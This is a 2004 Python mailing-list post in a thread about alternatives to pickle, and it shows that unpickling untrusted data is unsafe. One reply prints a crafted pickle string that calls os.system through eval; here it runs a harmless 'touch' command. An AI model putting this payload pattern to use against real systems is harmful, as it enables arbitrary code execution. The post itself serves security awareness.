Alternatives for pickle?

exarkun at divmod.com exarkun at divmod.com
Tue Oct 12 19:38:38 CEST 2004


On 12 Oct 2004 08:25:10 -0700, fuzzyman at gmail.com (Michael Foord) wrote:
>Antoon Pardon <apardon at forel.vub.ac.be> wrote in message news:<slrncmkgq0.54i.apardon at rcpc42.vub.ac.be>...
> > I'm writing a little game, a gridler application, where you
> > can turn pixmaps into puzzle's and try to solve them. I already
> > have the data structure for such a puzzle worked out, one of
> > the problems is writing it to a file and reading it back in.
> > 
> > I first went to the pickle module but there I read this.
> > 
> > | Warning: The pickle module is not intended to be secure against
> > | erroneous or maliciously constructed data. Never unpickle data
> > | received from an untrusted or unauthenticated source.
> > 
> 
> Hmmm..... I wonder how easy it is to craft a malicious pickle that
> will automatically run code objects just because they are unpickled.
> My guess is that it's quite difficult - I've never heard of it *ever*
> being done. Someone would have to be *very* malicious to work out how
> to do it on the off chance of planting a back door into someone's
> machine through a program like yours. No offence intended, but if they
> were going to go to all that effort I expect they might aim for
> something with a wider audience.

  It's absolutely positively trivial.  It took me about 30 seconds to come up with this pickle, about a year ago:

  'c__builtin__\neval\np0\n(S"__import__(\'os\').system(\'touch blah\')"\np1\ntp2\nRp3\n.'

  Anyone with moderate knowledge of pickle is capable of constructing something similar.

  Jp



More information about the Python-list mailing list